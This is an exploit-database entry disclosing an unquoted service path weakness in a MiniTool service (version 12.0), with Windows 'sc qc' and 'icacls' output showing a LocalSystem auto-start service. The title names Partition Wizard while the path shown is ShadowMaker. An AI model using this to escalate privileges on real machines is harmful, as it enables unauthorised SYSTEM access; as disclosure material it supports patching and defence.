exploit-db-mirror/exploits/windows/local/50859.txt

# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path
# Date: 07/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.0
# Tested: Windows 10 Pro x64 es

# PoC :

C:\Users\saudh>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe"

C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                           BUILTIN\Administrators:(I)(F)
                                                           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files